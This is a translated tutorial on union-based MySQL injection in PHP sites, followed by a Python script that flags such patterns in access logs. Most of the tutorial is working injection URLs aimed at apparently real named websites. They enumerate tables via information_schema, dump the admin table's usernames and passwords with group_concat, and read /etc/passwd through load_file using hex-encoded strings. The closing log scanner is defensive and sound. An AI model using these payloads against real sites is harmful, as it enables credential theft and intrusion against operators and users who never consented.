PHP+MySQL Injection Example and Theory

Source: Internet
Author: User
Tags: mysql injection

First, the difference between logic errors and syntax errors:

The biggest difference is that a syntax error does not get past the compiler, while a logic error does. Specifically, a syntax error violates the basic rules of the language, such as omitting the semicolon in a language that requires statements to end with one.

A logic error is an error in the algorithm. For example, if the termination condition of a loop is not written, the statement still compiles, but at run time the program enters an infinite loop it cannot leave.

Here's an example: http://www.jieyanbar.com/jycs.look.php?ID=293

If we add a single quote ' we get an error; this is a syntax error, because the unbalanced quotation mark violates the rule that quotes must open and close. If we add and+1=2 we also get an error (a different page); this is a logic error, because the computer evaluates 1=2 and it is false.

Next, UNION:

First, look up UNION: it combines the results of two or more queries into a single result set that contains all the rows of all the queries. In plain terms, UNION is a combined query. In select a,b,c from d where xx=1, the 1 is the value that appears in the URL as php?id=1. If that value is not filtered properly, then id=1 union select ... is appended to the original query, so select a,b,c from d where xx=1 union select 1,2,3 executes as long as the number of columns matches; if it does not match, that is a logic error. For example: http://www.jieyanbar.com/jycs.look.php?ID=293+and+1=1+union+select+1,2,3 returns the error "The used SELECT statements have a different number of columns", meaning the number of columns in your SELECT is inconsistent with the original one. The UNION only continues when the counts are equal, so you keep trying numbers until the page comes back normally, which here happens at 5.

Next, the injection statements:

http://www.jieyanbar.com/jycs.look.php?ID=-1+union+select+1,2,3,4,5+from+admin

http://www.jieyanbar.com/jycs.look.php?id=-1+union+select+1,2,group_concat(distinct+adminname,0x5c,adminpwd),4,5+from+admin

First, two functions: GROUP_CONCAT() shows all rows at once, while CONCAT() and CONCAT_WS() show only one row. But this method is still clumsy, because the table name and the field names have to be guessed.

Next, the methods for enumerating tables and fields:

MySQL has a database called information_schema that stores the names of all tables and all fields in every database. The table names are in the columns table of information_schema (schema means diagram, plan, outline), in the column table_name, and the field names are there too, in the column column_name.

http://www.jieyanbar.com/jycs.look.php?ID=-1+union+select+1,2,3,4,5+from+information_schema.columns In this way we can concat the contents of the columns table, starting from +from+information_schema. But the statement above has a drawback: there are several databases, and even the table names inside information_schema itself get concatenated out. So add a WHERE clause: http://www.jieyanbar.com/jycs.look.php?ID=-1+union+select+1,2,GROUP_CONCAT(Distinct+table_name),4,5+from+information_schema.columns+where+table_schema=database(). database() means the database currently in use.

Now the structure of information_schema in detail. information_schema has a table called columns. columns records the names of all fields in MySQL; every record has the attributes column_name (the field name), table_name (the name of the table the field belongs to) and table_schema (the name of the database that table is in). The query union select group_concat(table_name) from information_schema.columns is then placed into the injection statement. The problem, however, is that if a table x has three fields a, b and c, information_schema.columns holds three records for them, so table x appears three times. To avoid the repetition we add DISTINCT: group_concat(DISTINCT table_name). http://www.jieyanbar.com/jycs.look.php?ID=-1+union+select+1,2,group_concat(Distinct+table_name),4,5+from+information_schema.columns+where+table_schema=database() The precise meaning is: output all table_name values of the current database, that is, the tables in the database the query is using now. Once the tables are known, finding the fields is simple. Look at the statement above: there is an admin table, right?

Here we convert admin to its hex value (that is, base 16): select group_concat(DISTINCT column_name) from information_schema.columns where table_name=0x61646d696e (the hex encoding of admin is 0x61646d696e; MySQL recognizes hex literals as strings automatically).

If you do not convert to hex, the WHERE condition is written where table_name='admin', and the quotes will cause problems on the server.

Http://www.jieyanbar.com/jycs.look.php?ID=-1+union+select+1,2,GROUP_CONCAT (distinct+column_name), 4,5+from+ information_schema.columns+where+table_name=0x61646d696e

Http://www.jieyanbar.com/jycs.look.php?ID=-1+union+select+1,2,GROUP_CONCAT (distinct+column_name), 4,5+from+ Information_schema.columns+where+table_name= ' admin '

The two mean the same thing, but they do not behave the same.

Then there are a few MySQL functions:

Generally I just copy these directly: http://www.jieyanbar.com/jycs.look.php?ID=-1+union+select+1,concat (User (), database (), version () ), 3,4,5

concat(user(), database(), version())

However, there is a problem: the output mlyjyb@localhostmlyjy5.0.77 runs together and cannot be split apart, so hex is used again, choosing a colon : to separate the three values. The hex of a colon is 0x3a.

Http://www.jieyanbar.com/jycs.look.php?ID=-1+union+select+1,concat (Database (), 0x3a,user (), 0x3a,version ()), 3,4,5

Of these three functions, database() is the name of the database currently in use, user() is the user name the database is being accessed as, and version() is the version of the MySQL server, which is either 4.x or 5.x.

Then there are two other uses. One is load_file(). This function is demanding about permissions and usually only works on sites running on their own standalone server. load_file() reads a file from disk as text. Usage: select load_file('file path');

For example:

Http://www.nicegirlproject.jp/event_Info.php?id=-1+union+select+1,2,3,4,load_file (0x2f6574632f706173737764), 6,7,8,9,0,11,12

Recommended: http://blackbap.org/?p=archive&id=41 describes the Linux file system layout.
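For the defending side, the patterns walked through in this post (the and 1=2 probe, union select with column-count guessing, information_schema.columns enumeration, hex literals in place of quoted strings, and load_file()) are easy to spot in web server access logs once the query string is URL-decoded. The following is an added example, not code from the original post; the log lines are constructed, the host and IPs are placeholders, and the rules are heuristics keyed to exactly those patterns.

```python
"""Flag request URLs that carry the union-based MySQL injection patterns
described above. Log lines below are constructed, not real traffic."""
import re
from urllib.parse import unquote_plus

# (label, regex) pairs, applied case-insensitively to the decoded query string.
RULES = [
    ("tautology-probe", re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("information-schema", re.compile(r"\binformation_schema\s*\.\s*(columns|tables)\b", re.I)),
    ("hex-literal", re.compile(r"=\s*0x[0-9a-f]{2,}", re.I)),   # quote-free string literal
    ("load-file", re.compile(r"\bload_file\s*\(", re.I)),
]

def decode_query(url):
    """Return the decoded query string: '+' becomes space and %xx is unescaped,
    which is how the web server and PHP see it before it reaches MySQL."""
    return unquote_plus(url.split("?", 1)[1]) if "?" in url else ""

def classify(url):
    """Return the labels of every rule the decoded query string trips."""
    q = decode_query(url)
    return [label for label, rx in RULES if rx.search(q)]

def scan_log(lines):
    """Return (client_ip, url, labels) for each combined-format log line whose
    request URL trips at least one rule."""
    hits = []
    for line in lines:
        m = re.match(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ', line)
        if not m:
            continue          # not a request line we understand; skip it
        ip, url = m.group(1), m.group(2)
        labels = classify(url)
        if labels:
            hits.append((ip, url, labels))
    return hits

# Constructed Apache combined-format lines; /look.php is a placeholder path.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /look.php?ID=293 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /look.php?ID=293+and+1=2 HTTP/1.1" 200 312',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /look.php?ID=-1+union+select+1,2,3,4,5+from+information_schema.columns+where+table_name=0x61646d696e HTTP/1.1" 200 4871',
    '198.51.100.2 - - [10/Oct/2023:13:57:10 +0000] "GET /look.php?ID=12 HTTP/1.1" 200 5090',
    '203.0.113.7 - - [10/Oct/2023:13:58:21 +0000] "GET /look.php?id=-1+union+select+1,2,load_file(0x2f6574636f706173737764),4,5 HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    for ip, url, labels in scan_log(SAMPLE_LOG):
        print(ip, ",".join(labels), url)
```

Decoding first matters: matching the raw URL would miss percent-encoded variants of the same payloads, and a single client tripping the tautology probe and then union-select in sequence is the column-count guessing described above.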
